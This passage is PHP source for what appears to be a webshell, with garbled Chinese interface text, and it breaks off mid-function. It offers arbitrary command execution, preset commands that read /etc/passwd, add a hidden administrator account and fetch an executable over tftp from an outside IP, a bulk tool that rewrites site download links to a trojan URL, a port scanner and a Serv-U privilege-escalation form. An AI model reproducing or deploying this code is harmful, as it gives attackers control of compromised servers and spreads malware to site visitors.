function showth(th){
if(th == 'a') document.getElementById('setauto').innerHTML = '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br><3E><EFBFBD><E6BBBB>Ϊ:<textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>';
if(th == 'b') document.getElementById('setauto').innerHTML = '<br><3E><><EFBFBD>غ<EFBFBD>׺ <input type="text" name="tca" id="tca" value=".exe|.7z|.rar|.zip|.gz|.txt" style="width:500px;"><br><br><3E><EFBFBD><E6BBBB>Ϊ <input type="text" name="tcb" id="tcb" value="http://blackbap.org/muma.exe" style="width:500px;">';
return true;
}
function autoup(){
if(document.getElementById('tp').value == ''){alert(<><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>');return false;}
if(document.getElementById('tt').value == ''){alert('<27><><EFBFBD>Ͳ<EFBFBD><CDB2><EFBFBD>Ϊ<EFBFBD><CEAA>');return false;}
if(document.getElementById('tca').value == ''){alert('<27><><EFBFBD><EFBFBD><EBB2BB>Ϊ<EFBFBD><CEAA>');return false;}
document.getElementById('tform').submit();
}
</script>
<form method="POST" name="tform" id="tform" action="?s=d">
<div class="actall" style="height:35px;"><EFBFBD>滻·<EFBFBD><EFBFBD> <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fulllll(options[selectedIndex].value)'>
<option value="0" selected>--<EFBFBD><EFBFBD>Χѡ<EFBFBD><EFBFBD>--</option>
<option value="1"><EFBFBD><EFBFBD>վ<EFBFBD><EFBFBD>Ŀ¼</option>
<option value="2"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼</option>
</select></div>
<div class="actall" style="height:35px;"><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fulllll(options[selectedIndex].value)'>
<option value="0" selected>--<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѡ<EFBFBD><EFBFBD>--</option>
<option value="3"><EFBFBD><EFBFBD>̬<EFBFBD>ļ<EFBFBD></option>
<option value="4"><EFBFBD>ű<EFBFBD>+<EFBFBD><EFBFBD>̬</option>
<option value="5">JS<EFBFBD>ļ<EFBFBD></option>
</select></div>
<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth('a')" checked><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>е<EFBFBD>ָ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="radio" name="th" value="b" onclick="showth('b')"><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>е<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD>ַ<br>
<div id="setauto"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br><EFBFBD><EFBFBD><EFBFBD>Ϊ <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>޸<EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD></div>
<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked><EFBFBD><EFBFBD><EFBFBD>滻Ӧ<EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>к<EFBFBD><EFBFBD>ļ<EFBFBD>
<br><input type="radio" name="tb" value="b"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>滻Ӧ<EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD></div>
<div class="actall"><input type="button" value="<EFBFBD><EFBFBD>ʼ<EFBFBD>" style="width:80px;height:26px;" onclick="autoup();"></div>
</form>
END;
return true;
}
//ɨ<><C9A8>ľ<EFBFBD><C4BE>
function Antivirus_Auto($sp,$features,$st,$sb)
{
if(($h_d = @opendir($sp)) == NULL) return false;
$ROOT_DIR = File_Mode();
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
$Filepath = File_Str($sp.'/'.$Filename);
if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);
if(eregi($st,$Filename))
{
if($Filepath == File_Str(__FILE__)) continue;
$ic = File_Read($Filepath);
foreach($features as $var => $key)
{
if(stristr($ic,$key))
{
$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
echo ' <a href="'.$Fileurls.'" target="_blank"> <font color="#8B0000"> '.$Filepath.' </font> </a> <br> <20><><a href="?s=e&fp='.urlencode($sp).'&fn='.$Filename.'&dim='.urlencode($key).'" target="_blank"> <20>༭ </a> <a href="?s=e&df='.urlencode($Filepath).'" target="_blank"> ɾ<><C9BE> </a> <20><> ';
echo ' <20><> '.$Filetime.' <20><> <font color="#FF0000"> '.$var.' </font> <br> <br> '."\r\n";
break;
}
}
ob_flush();
flush();
}
}
@closedir($h_d);
return true;
}
function Antivirus_e()
{
if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo <><C9BE><EFBFBD>ɹ<EFBFBD>';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? <><C9BE><EFBFBD>ɹ<EFBFBD>' : <><C9BE>ʧ<EFBFBD><CAA7>';} return false;}
if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
$SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
$features_php = array('evalһ<6C><EFBFBD><E4BBB0><EFBFBD><EFBFBD>'=>'eval(','<27><><EFBFBD><EFBFBD>read<61><64><EFBFBD><EFBFBD>'=>'->read()','<27><><EFBFBD><EFBFBD>readdir<69><72><EFBFBD><EFBFBD>3'=>'readdir(','MYSQL<51>Զ<EFBFBD><D4B6><EFBFBD><E5BAAF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'returns string soname','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1'=>'eval(gzinflate(','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>2'=>'eval(base64_decode(','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>3'=>'base64_decode(','evalһ<6C>仰2'=>'eval (','php<68><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'copy($_FILES','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>2'=>'copy ($_FILES','<27>ϴ<EFBFBD><CFB4><EFBFBD><EFBFBD><EFBFBD>'=>'move_uploaded_file($_FILES','<27>ϴ<EFBFBD><CFB4><EFBFBD><EFBFBD><EFBFBD>2'=>'move_uploaded_file ($_FILES','С<><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'str_replace(\'\\\\\',\'/\',');
$features_asx = array('<27>ű<EFBFBD><C5B1><EFBFBD><EFBFBD><EFBFBD>'=>'VBScript.Encode','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'#@~^','fso<73><6F><EFBFBD><EFBFBD>'=>'fso.createtextfile(path,true)','excuteһ<65>仰'=>'execute','evalһ<6C>仰'=>'eval','wscript<70><74><EFBFBD><EFBFBD>'=>'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B','<27><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'13709620-C279-11CE-A49E-444553540000','wscript<70><74><EFBFBD><EFBFBD>'=>'WScript.Shell','fso<73><6F><EFBFBD><EFBFBD>'=>'0D43FE01-F093-11CF-8940-00A0C9054228',<><CAAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'<27><><EFBFBD><EFBFBD>','aspx<70><78><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'Process.GetProcesses','aspxһ<78>仰'=>'Request.BinaryRead');
print<<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">ɨ<EFBFBD><EFBFBD>·<EFBFBD><EFBFBD> <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">ľ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="checkbox" name="stphp" value="php" checked>phpľ<EFBFBD><EFBFBD>
<input type="checkbox" name="stasx" value="asx">asp+aspxľ<EFBFBD><EFBFBD></div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked><EFBFBD><EFBFBD>ɨ<EFBFBD><EFBFBD>Ӧ<EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>к<EFBFBD><EFBFBD>ļ<EFBFBD>
<br><input type="radio" name="sb" value="b"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɨ<EFBFBD><EFBFBD>Ӧ<EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD></div>
<div class="actall"><input type="submit" value="<EFBFBD><EFBFBD>ʼɨ<EFBFBD><EFBFBD>" style="width:80px;"></div>
</form>
END;
if(!empty($_POST['sp']))
{
echo '<div class="actall">';
if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';}
if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
$sb = ($_POST['sb'] == 'a') ? true : false;
echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? <><C9A8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>' : '<27><EFBFBD><ECB3A3>ֹ';
echo '</div>';
}
return true;
}
//<2F><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
{
//echo $sfp.'<br>'.$sfc.'<br>'.$sft.'<br>'.$sff.'<br>'.$sfb;
if(($h_d = @opendir($sfp)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
if(eregi($sft,$Filename)) continue;
$Filepath = File_Str($sfp.'/'.$Filename);
if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
if($sff)
{
if(stristr($Filename,$sfc))
{
echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
ob_flush();
flush();
}
}
else
{
$File_code = File_Read($Filepath);
if(stristr($File_code,$sfc))
{
echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
ob_flush();
flush();
}
}
}
@closedir($h_d);
return true;
}
function Findfile_j()
{
if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo <><C9BE><EFBFBD>ɹ<EFBFBD>';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? <><C9BE><EFBFBD>ɹ<EFBFBD>' : <><C9BE>ʧ<EFBFBD><CAA7>';} return false;}
if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip|.pdf|.dll|.exe|.txt|.inf|.ppt|.xls|.js';
print<<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">ɨ<EFBFBD><EFBFBD>·<EFBFBD><EFBFBD> <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall"><EFBFBD>ؼ<EFBFBD><EFBFBD>ִ<EFBFBD> <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD>
<input type="radio" name="sff" value="b"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ӧ<EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>к<EFBFBD><EFBFBD>ļ<EFBFBD>
<br><input type="radio" name="sfb" value="b"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ӧ<EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD></div>
<div class="actall"><input type="submit" value="<EFBFBD><EFBFBD>ʼɨ<EFBFBD><EFBFBD>" style="width:80px;"></div>
</form>
END;
if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))
{
echo '<div class="actall">';
$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);
$sff = ($_POST['sff'] == 'a') ? true : false;
$sfb = ($_POST['sfb'] == 'a') ? true : false;
echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>' : '<27><EFBFBD><ECB3A3>ֹ';
echo '</div>';
}
return true;
}
//ϵͳ<CFB5><CDB3>Ϣ
function Info_Cfg($varname){
switch($result = get_cfg_var($varname)){
case 0:return "No";break;
case 1:return "Yes";break;
default:return $result;break;}}
function Info_Fun($funName){return(false !==function_exists($funName)) ? "Yes" : "No";}
function Info_f()
{
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD>";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if($dis_func == ""){$dis_func = "No";}
else{
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>",date("Y<EFBFBD><EFBFBD>m<EFBFBD><EFBFBD>d<EFBFBD><EFBFBD> h:i:s",time())."&nbsp;/&nbsp;".gmdate("Y<EFBFBD><EFBFBD>n<EFBFBD><EFBFBD>j<EFBFBD><EFBFBD> H:i:s",time()+8*3600)),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<3A>˿<EFBFBD>(ip)","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>:".$_SERVER['SERVER_PORT']." ( ".gethostbyname($_SERVER['SERVER_NAME'])." )"),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ(<28><><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD>)",PHP_OS." (".$_SERVER['HTTP_ACCEPT_LANGUAGE'].")"),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",$_SERVER['SERVER_SOFTWARE']),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>IP",getenv('REMOTE_ADDR')),
array("PHP<EFBFBD><EFBFBD><EFBFBD>з<EFBFBD>ʽ(<28>汾)",strtoupper(php_sapi_name())."(".PHP_VERSION.") / <20><>ȫģʽ:".Info_Cfg("safemode")),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա",$adminmail),
array("<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>·<EFBFBD><EFBFBD>",__FILE__),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD>URL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>[allow_url_fopen]",Info_Cfg("allow_url_fopen")),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>[enable_dl]",Info_Cfg("enable_dl")),
array("<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ[display_errors]",Info_Cfg("display_errors")),
array("<EFBFBD>Զ<EFBFBD><EFBFBD><EFBFBD>ȫ<EFBFBD>ֱ<EFBFBD><EFBFBD><EFBFBD>[register_globals]",Info_Cfg("register_globals")),
array("<EFBFBD>Զ<EFBFBD><EFBFBD>ַ<EFBFBD><EFBFBD><EFBFBD>ת<EFBFBD><EFBFBD>[magic_quotes_gpc]",Info_Cfg("magic_quotes_gpc")),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>ʹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>[memory_limit]",Info_Cfg("memory_limit")),
array("POST<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֽ<EFBFBD>[post_max_size]",Info_Cfg("post_max_size")),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD>[upload_max_filesize]",$upsize),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD>[max_execution_time]",Info_Cfg("max_execution_time")."<EFBFBD><EFBFBD>"),
array("<EFBFBD><EFBFBD><EFBFBD>ú<EFBFBD><EFBFBD><EFBFBD>[disable_functions]",$dis_func),
array("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>[phpinfo()]",$phpinfo),
array("Ŀǰ<EFBFBD><EFBFBD><EFBFBD>п<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD>diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array("GZѹ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>֧<EFBFBD><EFBFBD>[zlib]",Info_Fun("gzclose")),
array("ZIPѹ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>֧<EFBFBD><EFBFBD>[ZipArchive(php_zip)]",Info_Fun("zip_open")),
array("IMAP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD>ϵͳ",Info_Fun("imap_close")),
array("XML<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",Info_Fun("xml_set_object")),
array("FTP<EFBFBD><EFBFBD>½",Info_Fun("ftp_login")),
array("Session֧<EFBFBD><EFBFBD>",Info_Fun("session_start")),
array("Socket֧<EFBFBD><EFBFBD>",Info_Fun("fsockopen")),
array("MySQL<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("mysql_close")),
array("MSSQL<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("mssql_close")),
array("Postgre SQL<51><4C><EFBFBD>ݿ<EFBFBD>",Info_Fun("pg_close")),
array("SQLite<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("sqlite_close")),
array("Oracle<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("ora_close")),
array("Oracle 8<><38><EFBFBD>ݿ<EFBFBD>",Info_Fun("OCILogOff")),
array("SyBase<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("sybase_close")),
array("Hyperwave<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("hw_close")),
array("InforMix<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("ifx_close")),
array("FilePro<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>",Info_Fun("filepro_fieldcount")),
array("DBA/DBM<42><4D><EFBFBD><EFBFBD>",Info_Fun("dba_close")."&nbsp;/&nbsp;".Info_Fun("dbmclose")),
array("ODBC/dBASE<53><45><EFBFBD><EFBFBD>",Info_Fun("odbc_close")."&nbsp;/&nbsp;".Info_Fun("dbase_close")),
array("PREL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>﷨[PCRE]",Info_Fun("preg_match")),
array("PDF֧<EFBFBD><EFBFBD>",Info_Fun("pdf_close")),
array("ͼ<EFBFBD>δ<EFBFBD><EFBFBD><EFBFBD>[GD Library]",Info_Fun("imageline")),
array("SNMP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Э<EFBFBD><EFBFBD>",Info_Fun("snmpget")),);
echo '<table width="100%" border="0">';
for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
echo '</table>';
return true;
}
//ִ<><D6B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
function Exec_Run($cmd)
{
$res = '';
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
return $res;
}
function Exec_g()
{
$res = '<27><><EFBFBD><EFBFBD>';
$cmd = 'dir';
if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}
print<<<END
<script language="javascript">
function sFull(i){
Str = new Array(14);
Str[0] = "dir";
Str[1] = "ls /etc";
Str[2] = "cat /etc/passwd";
Str[3] = "cp -a /home/www/html/a.php /home/www2/";
Str[4] = "uname -a";
Str[5] = "gcc -o /tmp/silic /tmp/silic.c";
Str[6] = "net user silic silic /add & net localgroup administrators silic /add";
Str[7] = "net user";
Str[8] = "netstat -an";
Str[9] = "ipconfig";
Str[10] = "copy c:\\1.php d:\\2.php";
Str[11] = "tftp -i 123.234.222.1 get silic.exe c:\\silic.exe";
Str[12] = "lsb_release -a";
Str[13] = "chmod 777 /tmp/silic.c";
document.getElementById('cmd').value = Str[i];
return true;
}
</script>
<form method="POST" name="gform" id="gform" action="?s=g"><center><div class="actall">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:399px;">
<select onchange='return sFull(options[selectedIndex].value)'>
<option value="0" selected>--<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--</option>
<option value="1"><EFBFBD>ļ<EFBFBD><EFBFBD>б<EFBFBD></option>
<option value="2"><EFBFBD><EFBFBD>ȡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="3"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></option>
<option value="4">ϵͳ<EFBFBD><EFBFBD>Ϣ</option>
<option value="5"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></option>
<option value="6"><EFBFBD><EFBFBD><EFBFBD>ӹ<EFBFBD><EFBFBD><EFBFBD></option>
<option value="7"><EFBFBD>û<EFBFBD><EFBFBD>б<EFBFBD></option>
<option value="8"><EFBFBD><EFBFBD>˿<EFBFBD></option>
<option value="9"><EFBFBD><EFBFBD><EFBFBD>ַ</option>
<option value="10"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></option>
<option value="11">FTP<EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="12"><EFBFBD>ں˰汾</option>
<option value="13"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
</select>
<input type="submit" value="ִ<EFBFBD><EFBFBD>" style="width:80px;"></div>
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center></form>
END;
return true;
}
//ɨ<><C9A8><EFBFBD>˿<EFBFBD>
function Port_i()
{
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|22|23|25|80|110|111|135|139|443|445|1433|1521|3306|3389|4899|5432|5631|7001|8000|8080|14147|43958';
print<<<END
<form method="POST" name="iform" id="iform" action="?s=i">
<div class="actall">ɨ<EFBFBD><EFBFBD>IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
<div class="actall"><EFBFBD>˿ں<EFBFBD> <input type="text" name="port" value="{$Port_port}" style="width:720px;"></div>
<div class="actall"><input type="submit" value="ɨ<EFBFBD><EFBFBD>" style="width:80px;"></div>
</form>
END;
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
{
echo '<div class="actall">';
$ports = explode('|', $_POST['port']);
for($i = 0;$i < count($ports);$i++)
{
$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2);
echo $fp ? '<font color="#FF0000"><3E><><EFBFBD>Ŷ˿<C5B6> ---> '.$ports[$i].'</font><br>' : '<27>رն˿<D5B6> ---> '.$ports[$i].'<br>';
ob_flush();
flush();
}
echo '</div>';
}
return true;
}
//ServU
function Servu_l()
{
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print<<<END
<div class="actall"><a href="?s=l">[ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]</a> <a href="?s=l&o=adduser">[<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD>]</a></div>
<form method="POST">
<div class="actall">ServU<EFBFBD>˿<EFBFBD> <input name="SUPort" type="text" value="43958" style="width:300px"></div>
<div class="actall">ServU<EFBFBD>û<EFBFBD> <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
<div class="actall">ServU<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
if($_GET['o'] == 'adduser')
{
print<<<END
<div class="actall"><EFBFBD>ʺ<EFBFBD> <input name="user" type="text" value="yoco" style="width:200px">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input name="password" type="text" value="silic" style="width:200px">
Ŀ¼ <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
END;
}
else
{
print<<<END
<div class="actall"><EFBFBD><EFBFBD>Ȩ<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input name="SUCommand" type="text" value="net user silic silic /add & net localgroup administrators silic /add" style="width:600px"><br>
<input name="user" type="hidden" value="silic">
<input name="password" type="hidden" value="silic">
<input name="part" type="hidden" value="C:\\\\"></div>
END;
}
echo '<div class="actall"><input type="submit" value="ִ<><D6B4>" style="width:80px;"></div></form>';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
{
echo '<div class="actall">';
$sendbuf = "";
